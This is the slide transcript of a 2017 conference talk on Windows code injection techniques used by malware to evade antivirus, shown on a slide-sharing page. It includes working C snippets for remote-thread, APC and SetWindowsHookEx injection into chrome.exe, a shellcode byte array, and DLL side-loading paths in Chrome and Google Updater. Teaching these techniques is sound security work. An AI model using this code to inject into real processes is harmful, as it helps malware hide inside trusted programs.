Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Windows Injection 101: from Zero to ROP

adr
August 27, 2017
Technology
2
1.8k

Windows Injection 101: from Zero to ROP

惡意程式開發技術在各種防毒產品技術提升下也在求新求變。從最原始的純執行程式、DLL模組化的惡意程式、注入系統服務型的惡意程式,甚至是以 Zero-day 為基礎散佈的惡意程式。 而在現今防毒產品、各項系統防護日趨完善之下,若沒有 Zero-day 能突破這些穩定的防護設計,惡意程式便難以做出許多需要權限的事情(如:寫入檔案、創建本地伺服器、創建開機啟動項)因此如何劫持其他高權限、偽造自身為使用者可信任的程式,便是現今惡意程式的一大考驗。

本議程將探討 Windows 作業系統上各項用於劫持系統程式權限、偽造自身身份的注入技巧,並帶入案例介紹如:DLL Inject、UAC Bypassing via DLL Inject、Process Hollowing、DLL Side-Loading 與系統實作造成的延伸型 DLL Side-Loading 問題、Atombombing 與利用 explorer 的消息漏洞串接 ROP Chain 實作注入技巧。

To circumvent the Anti-Virus protection, adversaries have significantly improved the attacking techniques. Generally speaking, it is hard to escalate privilege without applying 0 day exploits. In other words, hijacking the high privilege processes trusted by users is the most important but challenging factor for successful attack.

In this session, we introduce the skills to hijack privileged system processes on Windows operating system. To clearly introduce the concept, we start from some basic techniques including: DLL Injection, UAC Bypassing, Process Hollowing, DLL Side Loading. Furthermore, the Atombombing and the ROP Gadget Injection will be illustrated to exploit the bugs of Windows Explorer for attack.

adr

August 27, 2017
Tweet

More Decks by adr

See All by adr
Skrull Like A King: 從重兵看守的天眼防線殺出重圍
aaaddress1
3
1.3k
Rebuild The Heaven's Gate: from 32 bit Hell back to Heaven Wonderland
aaaddress1
0
970
重建天堂之門:從 32bit 地獄一路打回天堂聖地
aaaddress1
0
350
Reversing In Wonderland: Neural Network Based Malware Detection Techniques
aaaddress1
2
670
CYBERSEC: 唉唷,你的簽章根本沒在驗啦。
aaaddress1
1
3.7k
SITCON: Playing Win32 Like a K!NG ;)
aaaddress1
2
1k
NTUST [2019]: Windows Reversing
aaaddress1
0
1.1k
Duplicate Paths Attack: Get Elevated Privilege from Forged Identities
aaaddress1
0
1.4k
SDN Final Report
aaaddress1
0
430

Other Decks in Technology

See All in Technology
LangSmith入門―トレース/評価/プロンプト管理などを担うLLMアプリ開発プラットフォーム
os1ma
3
160
Postman v10リリース後を振り返る / Looking back at Postman v10 after release
yokawasa
1
160
20分で完全に理解するGrafanaダッシュボード
hamadakoji
3
630
Google Cloud の AI を支える裏側のインフラを垣間見る!
maroon1st
0
350
Google Cloud Next '24 Recap(Cloud Run/k8s)
mokocm
0
210
KubeCon EU 2024 Recap “Kubernetes Policy Time Machine: Where to Next?”
ryysud
0
220
Azure Container Apps + Bicep 〜 こんな感じで運用しています
kaz29
2
480
Java EE/Jakarta EEの現状と将来 ―クラウドネイティブ時代にJava EEは対応できるのか?―
takakiyo
1
160
レガシーをぶっ壊せ。AEONで始めるDevRelの話 / Qiita Night 2024-2-22
aeonpeople
3
1.3k
Além do else! Categorizando Pokemóns com Pattern Matching no JavaScript
wmsbill
0
620
反実仮想機械学習とは何か
usaito
PRO
11
4.6k
Kernel MemoryでAzure OpenAI Serviceとお手軽データソース連携
mitsuzono
1
250

Featured

See All Featured
Building Adaptive Systems
keathley
31
1.9k
The Art of Programming - Codeland 2020
erikaheidi
42
12k
Git: the NoSQL Database
bkeepers
PRO
422
63k
jQuery: Nuts, Bolts and Bling
dougneiner
59
7.1k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
121
39k
Statistics for Hackers
jakevdp
789
220k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
9
8.3k
How to train your dragon (web standard)
notwaldorf
73
5.2k
Imperfection Machines: The Place of Print at Facebook
scottboms
260
12k
Fashionably flexible responsive web design (full day workshop)
malarkey
398
65k
In The Pink: A Labor of Love
frogandcode
138
21k
Making Projects Easy
brettharned
108
5.5k

Transcript

  1. [email protected] Windows Injection 101: from Zero to ROP

  2. ./Bio✨ • ⾺馬聖豪, aaaddress1 aka adr • Chroot, TDOH •

    TDOHConf: 2016 議程組長 & 2017 活動組長 • 精通 C/C++、Windows 特性、逆向⼯工程 • Speaker: HITCON CMT 2015 HITCON CMT 2016 Lightning SITCON 2016 SITCON 2017 iThome#Chatbot 2017 BSidesLV 2016 ICNC'17 MC2015 CISC 2016 資訊安全基礎技術⼯工作坊 資安實務攻防研習營 ⼤大.⼤大.⼤大..⼤大概啦

  3. [email protected] #murmur Some Bullsh*t after I submit this session

  4. [email protected] Amazing!

  5. [email protected] cfp2017.hitcon.org “六、欲投稿者請於 2017 年年 7 ⽉月 14 ⽇日前,⾄至⼤大會投稿 系統

    ( https://cfp2017.hitcon.org ) 註冊並上傳稿件,俾 利利議程委員審核,審核順序以投稿時間先後為準,如已 達本屆所需論⽂文數量量,⼤大會得提前截稿,故請儘速完成 投稿程序。”

  6. [email protected] 2017/7/18? https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

  7. [email protected] 議程中請不要睡著 我也很想睡 請踴躍舉⼿手發⾔言 說好不插嘴的! 請勿吸菸、抽⼤大⿇麻、跑百米賽跑、玩碟仙、摸八圈、 跳八家將、炸鹽酥雞、到我背後抓寶、問我會不會FreeStyle ./CoC @Loki the

    Corgi

  8. [email protected] Evolution Of Malware Long Story About How Malware Against

    AntiVirus

  9. [email protected] R3m0t3-C0ntr0l;H4ck;C&C; B4ckdo0r;Sh311;B0tn3t;K3y l0gger;Ma1ware;Ro0t;W0rm; Zer0-D4y;Trojan;Exp10it;H 4ck;$cript;Packet;Cr4ck;R 4T;$ecuri7y;vu1ner4bi1i7y 4dmini$tr4t0r;Byp4$$ing;= Hacker Friendly

    World

  10. [email protected] until AntiVirus;

  11. [email protected] PE (Portable Executable);

  12. [email protected] Virus Signature;

  13. [email protected] PE (Portable Executable);

  14. [email protected] DOS Header ‏DOS Program ‏NT Header ⋯⋯ PE File

    Header Optional Header

  15. [email protected] DOS Header ‏DOS Program ‏NT Header ⋯⋯ 1. DOS

    Header starts with 'MZ'
 2. *(DWORD *)((DOS Header + 0x3c) point to NT Header PE File Header Optional Header File Header is also referred to as COFF header. Records NumberOfSections, TimeDateStamp,SizeOfOptionalHeade r, etc.

  16. [email protected] Optional Header typedef struct _IMAGE_OPTIONAL_HEADER { WORD Magic; BYTE

    MajorLinkerVersion; BYTE MinorLinkerVersion; DWORD SizeOfCode; DWORD SizeOfInitializedData; DWORD SizeOfUninitializedData; DWORD AddressOfEntryPoint; DWORD BaseOfCode; DWORD BaseOfData; DWORD ImageBase; DWORD SectionAlignment; DWORD FileAlignment; WORD MajorOperatingSystemVersion; WORD MinorOperatingSystemVersion; WORD MajorImageVersion; WORD MinorImageVersion; WORD MajorSubsystemVersion; WORD MinorSubsystemVersion; DWORD Win32VersionValue; DWORD SizeOfImage; DWORD SizeOfHeaders; DWORD CheckSum; WORD Subsystem; WORD DllCharacteristics; DWORD SizeOfStackReserve; DWORD SizeOfStackCommit; DWORD SizeOfHeapReserve; DWORD SizeOfHeapCommit; DWORD LoaderFlags; DWORD NumberOfRvaAndSizes; IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; } IMAGE_OPTIONAL_HEADER, *PIMAGE_OPTIONAL_HEADER;

  17. [email protected] ‏DOS Program ‏NT Header PE Optional Header Section Header

    1 Section Header 2 ... Section Header N Section 1 Section 2 ... Section N Optional Header point to the first section header, and each sections between sizeof(PIMAGE_SECTION_HEADER) ⏞ Section Header Array

  18. [email protected] typedef struct _IMAGE_SECTION_HEADER { BYTE Name[IMAGE_SIZEOF_SHORT_NAME]; union { DWORD

    PhysicalAddress; DWORD VirtualSize; } Misc; DWORD VirtualAddress; DWORD SizeOfRawData; DWORD PointerToRawData; DWORD PointerToRelocations; DWORD PointerToLinenumbers; WORD NumberOfRelocations; WORD NumberOfLinenumbers; DWORD Characteristics; }; ‏DOS Program ‏NT Header PE Optional Header Section Header 1 Section Header 2 ... Section Header N Section 1 Section 2 ... Section N Each Section Header point to their Section Data, and records detail. e.g. VirtualAddress, Section Name, SizeOfRawData.

  19. [email protected] ‏DOS Program ‏NT Header PE Optional Header .text Header

    .rdata Header ... .text Section .rdata Section ... Section N void evil() { // connect with C&C ccLemon(); // do something evil eatYourFood(); } Each Section Header point to their Section Data, and records detail. e.g. VirtualAddress, Section Name, SizeOfRawData.

  20. [email protected] PE DOS Program Evil Function NT Header ... .text

    Section bool chkVirus(PBYTE mem) { /* 55 - push ebp 8b ec - mov ebp, esp 81 EC 08 01 00 00 - sub esp,00000108 */ char Signature[] = "\x55\x8B\xEC\x81\xEC\x08\x01"; return !strncmp((char *)mem+0xdead, Signature, 7); } (DOS Header + 0xdead)

  21. [email protected] So... How about Packer? UPX.exe

  22. [email protected] Real-Time Detection;

  23. [email protected] Malware.exe ... .text Section ... ... .text Section ...

    Ntdll.dll ... .text Section ... Kernel32.dll ... Process KiFastSystemCall __asm { sysenter } Windows Kernel (Ring0) normal eax = function index

  24. [email protected] Malware.exe ... .text Section ... ... .text Section ...

    Ntdll.dll ... .text Section ... sandbox.dll ... Process KiFastSystemCall __asm { sysenter } Windows Kernel (Ring0) Hook @ring3

  25. [email protected] KiFastSystemCall __asm { sysenter } Windows Kernel (Ring0) Malware.exe

    ... .text Section ... ... .text Section ... Ntdll.dll ... .text Section ... ... Process Malware.exe @ring0 Kernel32.dll

  26. [email protected] Malware Code Messenger.exe ... .text Section ... ... Process

    Blind-Spot Of Anti-Virus Place malcode into memory Make malcode called

  27. [email protected] Malware Code Messenger.exe ... .text Section ... ... Process

    RegOpenKey Windows Kernel (Ring0) under AV DeleteFile WriteProcessMemory

  28. [email protected] Injection Art Introduction of Injection Tricks

  29. [email protected] Issues Of Injection A.Place code in memory B.Execution C.Magic

  30. [email protected] Place code in memory 1. Ntdll.NtWriteVirtualMemory,
 Kernel32.WriteProcessMemory
 2. User32.SetWindowLong

    3. AtomBombing
 4. Exploit?

  31. [email protected] 1. Ntdll.NtCreateThreadEx,
 Ntdll.RtlCreateUserThread,
 Kernel32.CreateRemoteThread
 2. Ntdll.NtQueueApcThread,
 Kernel32.QueueUserAPC
 3. Import

    Address Table Hook 4. SetThreadContext + ResumeThread 5. Extra Window Memory (EWM) Vunerability 6. Exploit? Execution

  32. [email protected] ✨Magic✨ 1. Rundll 2. Registry Modification 3. DLL Side-Loading

    4. SetWindowsHookEx 5. Shims

  33. [email protected] Injection Art •Rundll32 •DLL Side-Loading •CreateRemoteThread •PE Injection •Process

    Hollowing •SetWindowsHookEx •Registry Modification •APC Injection & AtomBombing •Extra Window Memory (EWM) •IAT Hooking & Inline Hooking •Shims

  34. [email protected] Injection Art 0 Baby Steps

  35. [email protected] Rundll support.microsoft.com/en-us/help/164787/info-windows-rundll-and-rundll32-interface

  36. [email protected] Shim

  37. [email protected] Registry Modification Debugger Value (IFEO) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Image File

    Execution Options\ AppInit_DLLs HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Windows\AppInit_DLLs\

  38. [email protected] Injection Art 1 Typical Code Injection

  39. [email protected] Memory Map (Immunity Debugger)

  40. Malware.exe Ntdll.dll ... Process Kerne32.dll User32.dll ... Ntdll.dll ... Process

    Kerne32.dll User32.dll ... Messenger.exe Ntdll.dll ... Process Kerne32.dll User32.dll ... Chrome.exe Stack Memory Stack Memory Stack Memory Fixed ASLR Low Heigh Malware.exe

  41. [email protected] Malware.exe Ntdll.dll ... Process Kernel32.dll User32.dll ... Ntdll.dll ...

    Process Kernel32.dll User32.dll ... Chrome.exe OpenProcess() return access handle

  42. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process

    User32.dll ... Chrome.exe Memory Allocated VirtualAllocEx() Allocate a new space to store shellcode Kernel32.dll Kernel32.dll

  43. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process

    User32.dll ... Chrome.exe Shellcode WriteProcessMemory() Copy shellcode to memory space Kernel32.dll Kernel32.dll

  44. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process

    User32.dll ... Chrome.exe Shellcode CreateRemoteThread Thread Execute shellcode Kernel32.dll Kernel32.dll

  45. [email protected] HANDLE get_process_handle(wchar_t proc_name[]) { HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    PROCESSENTRY32 process = { 0 }; process.dwSize = sizeof(process); if (Process32First(snapshot, &process)) { do { if (!wcscmp(process.szExeFile, proc_name)) break; } while (Process32Next(snapshot, &process)); } CloseHandle(snapshot); if (!process.th32ProcessID) return NULL; return OpenProcess(PROCESS_ALL_ACCESS, 1, process.th32ProcessID); } OpenProcess

  46. [email protected] HANDLE access_token = get_process_handle(L"chrome.exe"); LPVOID mem = VirtualAllocEx( access_token,

    NULL, strlen(shellcode + 1), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); WriteProcessMemory( access_token, mem, shellcode, strlen(shellcode + 1), NULL ); CreateRemoteThread( access_token, NULL, 0, (LPTHREAD_START_ROUTINE)mem, 0, 0, NULL );

  47. [email protected] Injection Art 1.1 Typical Code Injection via APC

  48. [email protected] Malware.exe Ntdll.dll ... Process Kernel32.dll User32.dll ... Ntdll.dll ...

    Process Kernel32.dll User32.dll ... Chrome.exe OpenProcess() return access handle

  49. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process

    User32.dll ... Chrome.exe Memory Allocated VirtualAllocEx() Allocate a new space to store shellcode Kernel32.dll Kernel32.dll

  50. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process

    User32.dll ... Chrome.exe Shellcode WriteProcessMemory() Copy shellcode to memory space Kernel32.dll Kernel32.dll

  51. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process

    User32.dll ... Chrome.exe Shellcode CreateToolhelp32Snapshot() Thread 1 Thread 2 Thread 3 Thread 4 Thread ID Process 1 Chrome.exe 2 Chrome.exe ... N XXXX.exe Kernel32.dll Kernel32.dll

  52. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process

    User32.dll ... Chrome.exe Shellcode QueueUserAPC() Thread 1 Thread 2 Thread 3 Thread 4 Kernel32.dll Kernel32.dll

  53. [email protected] void apc_invoke(DWORD pid, LPVOID mem_func) { auto hSnapshot =

    CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0 ); THREADENTRY32 te = { sizeof(te) }; if (Thread32First(hSnapshot, &te)) { do { if (te.th32OwnerProcessID != pid) continue; HANDLE hThread = OpenThread( THREAD_SET_CONTEXT, FALSE, te.th32ThreadID ); if (hThread) QueueUserAPC((PAPCFUNC)mem_func, hThread, NULL); } while (::Thread32Next(hSnapshot, &te)); } } APC Inject

  54. [email protected] Injection Art 2 PE Injection

  55. [email protected] Issues of Code Inject Hard to develop Hard to

    repair Portability? char *shellcode = "\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b" "\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09" "\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d" "\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03" "\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81" "\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04" "\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03" "\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3" "\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68" "\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68" "\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9" "\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65" "\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01" "\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68" "\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68" "\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68" "\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57" "\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c" "\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78" "\x69\x74\x54\x53\xff\xd6\x57\xff\xd0";

  56. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process

    User32.dll ... Chrome.exe OpenProcess() return access handle Kernel32.dll Kernel32.dll

  57. [email protected] 7ZIP

  58. [email protected] PE DOS Program NtHeader ... OptionalHeader .ImageBase (0x400000) .SizeOfHeaders

    FileHeader .NumberOfSections .AddressOfEntryPoint SizeOfHeaders Section Header 1 (.text) Section Header 2 Section Header 3 Section Data 1 (.text) ... sizeof(Section Header) = IMAGE_SIZEOF_SECTION_HEADER =40(fixed) .SizeOfImage

  59. [email protected] PE NtHeader ... IMAGE SECTION HEADER Section Header 1

    (.text) Section Header 2 Section Header 3 Section Data 1 (.text) ... .VirtualAddress .PointerToRawData .SizeOfRawData SizeOfRawData SectionHeader[i] = PIMAGE_SECTION_HEADER( NtHeader + sizeof(IMAGE_NT_HEADERS) + IMAGE_SIZEOF_SECTION_HEADER * index ); DOS Program

  60. [email protected] Malware.exe Ntdll.dll ... Process Kernel32.dll User32.dll ... ... Process

    Chrome Memory Allocated VirtualAllocEx() Allocate memory at ImageBase(0x400000) (Length = SizeOfImage) 0x400000

  61. [email protected] Malware.exe Ntdll.dll ... Process Kernel32.dll User32.dll ... ... Process

    Chrome WriteProcessMemory() at ImageBase + 0x00 Copy SizeOfHeaders bytes from (malware.exe + 0x00) Image Header

  62. [email protected] DOS Program ... malware.exe ... Process Chrome NtHeader Section

    Header 1 Section Data 1 ... .VirtualAddress = 0xbeef Space@beef .PointerToRawData .SizeOfRawData copy SizeOfRaowData bytes from PointerToRawData via WriteProcessMemory() Image Header

  63. [email protected] Space@beef Section Header 1 ... malware.exe ... Process Chrome

    NtHeader Section Header2 Section Data 2 ... .VirtualAddress = 0xcafe Space@cafe .PointerToRawData .SizeOfRawData copy SizeOfRaowData bytes from PointerToRawData via WriteProcessMemory() Image Header DOS Program

  64. [email protected] .text ... Process Chrome Section 2 Section 3 ...

    Malware.exe Ntdll.dll Process User32.dll SetThreadContext() & ResumeThread() eax = AddressOfEntryPoint ... Malware.exe Image Header Kernel32.dll

  65. [email protected] Demo

  66. [email protected]

  67. [email protected] Injection Art 3 DLL Injection

  68. [email protected] LoadLibrary LoadLibraryA("junk.dll") ... .text Section ... Ntdll.dll ... Process

    Program.exe Kernel32.dll User32.dll

  69. [email protected] LoadLibrary LoadLibraryA("junk.dll") ... .text Section ... Ntdll.dll ... Process

    Program.exe Kernel32.dll User32.dll ... .text Section ... Junk.dll

  70. [email protected] LoadLibrary LoadLibraryA("junk.dll") ... .text Section ... Ntdll.dll ... Process

    Program.exe Kernel32.dll User32.dll ... ... Junk.dll .text Section Invoke DllMain() or DllEntry()

  71. [email protected] Malware.exe Ntdll.dll ... Process Kernel32.dll User32.dll ... Ntdll.dll ...

    Process Kernel32.dll User32.dll ... Chrome.exe OpenProcess() return access handle

  72. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Process Chrome Memory

    Allocated VirtualAllocEx() Allocate memory to store DLL path Ntdll.dll ... User32.dll ... Malware.exe Kernel32.dll Kernel32.dll

  73. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Process Chrome C:\hola.dll

    Ntdll.dll ... User32.dll ... WriteProcessMemory() Copy DLL path to memory space Malware.exe Kernel32.dll Kernel32.dll

  74. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Process Chrome C:\hola.dll

    Ntdll.dll ... User32.dll ... Malware.exe Fixed Kernel32.dll Kernel32.dll

  75. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Process Chrome C:\hola.dll

    Ntdll.dll ... User32.dll ... Malware.exe GetProcAddress( LoadLibrary("kernel32.dll"), "LoadLibraryA" ); Kernel32.dll Kernel32.dll

  76. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Process Chrome C:\hola.dll

    Ntdll.dll ... User32.dll ... Malware.exe LoadLibraryA CreateRem oteThread parameter Kernel32.dll Kernel32.dll

  77. [email protected] Demo

  78. [email protected] Injection Art 4 DLL Side-Loading

  79. news.softpedia.com/news/dll-hijacking-issue-plagues-products-like-firefox-chrome-itunes-openoffice-500060.shtml

  80. news.softpedia.com/news/dll-hijacking-issue-plagues-products-like-firefox-chrome-itunes-openoffice-500060.shtml DLL Hijacking Issue

  81. [email protected] Google Chrome

  82. [email protected] Google Updater

  83. [email protected] Google Updater

  84. [email protected] int __fastcall sub_2F64CA(HMODULE hModule, char ch) { /* ...

    */ if ( GetModuleFileNameW(hModule, &Filename, 0x104u) && ( PathRemoveFileSpecW(&Filename), memcpy(&pszPath, &Filename, 260), PathAppendW(&pszPath, L"goopdate.dll") )) { if (sub_2F6211(&pszPath)) { // make v4 point to goopdate.dll sub_2F68D4(&pszPath, sub_2FAB00(&pszPath)); result = 0; } /* ... */ }

  85. Google Updater

  86. [email protected] LoadLibrary LoadLibraryA("goopdate.dll") ... .text Section ... Ntdll.dll ... Process

    GoogleUpdate Kernel32.dll User32.dll

  87. [email protected] LoadLibrary ... .text Section ... Ntdll.dll ... Process GoogleUpdate

    Kernel32.dll User32.dll ... .text Section ... goopdate.dll LoadLibraryA("goopdate.dll")

  88. [email protected] LoadLibrary LoadLibraryA("goopdate.dll") ... .text Section ... Ntdll.dll ... Process

    GoogleUpdate Kernel32.dll User32.dll ... ... goopdate.dll .text Section Invoke DllEntry()

  89. [email protected] Demo

  90. [email protected] ✨Magic✨ DLL Side-Loading & Advanced Techniques

  91. [email protected] Issues Of Windows API

  92. [email protected] GetICMProfile

  93. [email protected] Logics of Chrome after Loading Pages

  94. [email protected] The logics in WinAPI -- GetICMProfile (Initialization)

  95. [email protected] IcmInitialize()

  96. [email protected] Ollydbg: Chrome

  97. [email protected] How LoadLibrary() Works

  98. [email protected] KernelBase.dll

  99. [email protected] {CURRENT_PATH}; C:\Windows\system32; C:\Windows\system; C:\Windows; .; C:\Program Files\Windows C:\Windows\System32\WindowsPowerShell\v1.0\; ...

    BaseGetProcessDllPath

  100. [email protected] for loop tries to find DLL in each system

    environment directory

  101. [email protected] GetICMProfile Ntdll.dll ... Process GDI32.dll ... Chrome.exe ... GetICMProfile

    Kernel32.dll

  102. [email protected] GetICMProfile Ntdll.dll ... Process GDI32.dll ... Chrome.exe ... GetICMProfile

    GetICMProfile() Kernel32.dll

  103. [email protected] GetICMProfile Ntdll.dll ... Process GDI32.dll ... Chrome.exe ... GetICMProfile

    GetICMProfile() Kernel32.dll LoadLibraryW("mscms.dll");

  104. [email protected] GetICMProfile Ntdll.dll ... Process GDI32.dll ... Chrome.exe ... GetICMProfile

    GetICMProfile() Kernel32.dll LoadLibraryW LoadLibraryW("mscms.dll");

  105. [email protected] GetICMProfile Ntdll.dll ... Process GDI32.dll ... Chrome.exe ... Kernel32.dll

    LoadLibraryW LoadLibraryW("mscms.dll"); ...\Chrome\Application; C:\Windows\system32; C:\Windows\system; C:\Windows; ...

  106. [email protected] GetICMProfile Ntdll.dll ... Process GDI32.dll ... Chrome.exe ... Kernel32.dll

    LoadLibraryW LoadLibraryW("mscms.dll"); ...\Chrome\Application\mscms.dll; C:\Windows\system32\mscms.dll; C:\Windows\system\mscms.dll; C:\Windows\mscms.dll; ... mscms.dll

  107. [email protected] Chrome Lastest Version 60.0.3112.101

  108. [email protected] Chrome Lastest Version 60.0.3112.101

  109. [email protected] Visual Style UI Rendering (Issues Of UxTheme.dll)

  110. [email protected] Hexedit & Winspy

  111. [email protected] cls_Forms_TCustomDockForm Forms::TCustomDockForm::Loaded(void) HexEdit

  112. [email protected] Dwmapi:: DwmExtendFrameIntoClientArea

  113. [email protected] UI Visual Style Issue

  114. [email protected] UxTheme::SetWindowTheme

  115. [email protected] UxTheme::IsCompositionActive call dwmapi::DwmIsCompositionEnabled

  116. [email protected] UxTheme::IsCompositionActive call dwmapi::DwmIsCompositionEnabled

  117. [email protected] •HEXEdit •7Zip •WinSpy •LoLTWLauncher •.NET Program •Borland C++ Program

    It allow us to hijack Visual Style UI Program

  118. [email protected] Injection Art 5 SetWindowHooksEx

  119. [email protected] SetWindowsHookEx HHOOK WINAPI SetWindowsHookEx ( _In_ int idHook, /*

    Hook Type */ _In_ HOOKPROC lpfn, /* function */ _In_ HINSTANCE hMod, /* module */ _In_ DWORD dwThreadId /* thread id */ );

  120. [email protected] SetWindowsHookEx 4 WH_CALLWNDPROC 12 WH_CALLWNDPROCRET 5 WH_CBT 9 WH_DEBUG

    11 WH_FOREGROUNDIDLE 3 WH_GETMESSAGE 1 WH_JOURNALPLAYBACK 0 WH_JOURNALRECORD 2 WH_KEYBOARD 13 WH_KEYBOARD_LL 7 WH_MOUSE 14 WH_MOUSE_LL -1 WH_MSGFILTER 10 WH_SHELL 6 WH_SYSMSGFILTER

  121. [email protected] Codes of Inject.dll LRESULT WINAPI msgProg(int code, WPARAM wParam,

    LPARAM lParam) { if (!disp) MessageBoxA(0, "Hello World", "HITCON 2017", 0); disp = true; return CallNextHookEx(NULL, code, wParam, lParam); } extern "C" { __declspec(dllexport) int hookStart() { hHook = SetWindowsHookEx(WH_GETMESSAGE, msgProg, hMod, 0); return !!hHook; } __declspec(dllexport) int hookStop() { return hHook && UnhookWindowsHookEx(hHook); } }

  122. [email protected] Codes of Injector.exe int main() { if (auto mod

    = LoadLibraryA("inject.dll")) { (int(*)())GetProcAddress ( LoadLibraryA("inject.dll"), "hookStart" )(); getchar(); } return 0; }

  123. [email protected] DLL Inject

  124. [email protected]

  125. [email protected] Injection Art 7 AtomBombing

  126. [email protected] https://breakingmalware.com/injection-techniques/atombombing-brand-new-code-injection-for-windows

  127. [email protected] GlobalAddAtom

  128. [email protected] GlobalGetAtomName

  129. [email protected] NtQueueApcThread NTSTATUS NtQueueApcThread ( HANDLE ThreadHandle, PKNORMAL_ROUTINE ApcRoutine, PVOID

    ApcContext, PVOID Argument1, PVOID Argument2 ); NtQueueApcThread: mov eax, 10Dh ; NtQueueApcThread mov edx, 7FFE0300h call dword ptr [edx]; KiFastSystemCall retn 14h

  130. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process

    User32.dll ... Chrome.exe Memory Allocated VirtualAllocEx() Allocate a new space to store shellcode Kernel32.dll Kernel32.dll

  131. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process

    User32.dll ... Chrome.exe Shellcode CreateToolhelp32Snapshot() Thread 1 Thread 2 Thread 3 Thread 4 Thread ID Process 1 Chrome.exe 2 Chrome.exe ... N XXXX.exe Kernel32.dll Kernel32.dll

  132. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process

    User32.dll ... Chrome.exe Shellcode GlobalGetAtomNameW Shellcode NtQueueApcThread() Thread 1 Thread 2 Thread 3 Thread 4 Kernel32.dll Kernel32.dll

  133. [email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process

    User32.dll ... Chrome.exe Shellcode NtQueueApcThread() Thread 1 Thread 2 Thread 3 Thread 4 Kernel32.dll Kernel32.dll

  134. [email protected] Injection Art 8 Extra Window Memory Vunerability

  135. [email protected] Shell_TrayWnd

  136. [email protected] int s_WndProc(HWND hWnd, DWORD Msg, DWORD wParam, DWORD lParam)

    { /* Initialization for Window */ if (!*lParam) return 0; else if ( Msg == WM_NCCREATE) { *(*lParam + 4) = hWnd; SetWindowLongW(hWnd, 0, *lParam); /* Custom WndProc */ return (void(*)())(*lParam + 8) ( *lParam, hWnd, WM_NCCREATE, wParam, lParam ); } /* ... Deal with normal Window Event ... */ }

  137. [email protected] int s_WndProc(HWND hWnd, DWORD Msg, DWORD wParam, DWORD lParam)

    { /* ... Initialization for Window ... */ /* Deal with normal Window Event */ DWORD wndSelf = GetWindowLongW(hWnd, 0); DWORD lParama; if ( wndSelf ) { /* InterlockedIncrement */ (void(*)())*wndSelf(wndSelf); /* Custom WndProc */ lParama = (*wndSelf+0x08)(wndSelf, hWnd, Msg, wParam, lParam); if ( Msg == WM_NCDESTROY ) { SetWindowLongW(hWnd, 0, 0); *(wndSelf+0x04) = 0; } /* Destroy Task */ (void(*)())(*wndSelf+0x04)(wndSelf); } else lParama = SHDefWindowProc(hWnd, Msg, wParam, lParam); return lParama; }

  138. [email protected] int s_WndProc(HWND hWnd, DWORD Msg, DWORD wParam, DWORD lParam)

    { /* ... Initialization for Window ... */ /* Deal with normal Window Event */ DWORD wndSelf = GetWindowLongW(hWnd, 0); DWORD lParama; if ( wndSelf ) { /* InterlockedIncrement */ (void(*)())*wndSelf(wndSelf); /* Custom WndProc */ lParama = (*wndSelf+0x08)(wndSelf, hWnd, Msg, wParam, lParam); if ( Msg == WM_NCDESTROY ) { SetWindowLongW(hWnd, 0, 0); *(wndSelf+0x04) = 0; } /* Destroy Task */ (void(*)())(*wndSelf+0x04)(wndSelf); } else lParama = SHDefWindowProc(hWnd, Msg, wParam, lParam); return lParama; }

  139. [email protected] Malware.exe ... Process ... Process Explorer.exe Shell_TrayWnd +0 lParam

    (vtable) +4 hWnd ... Window Class

  140. [email protected] ... Process ... Process Explorer.exe Shell_TrayWnd +4 hWnd ...

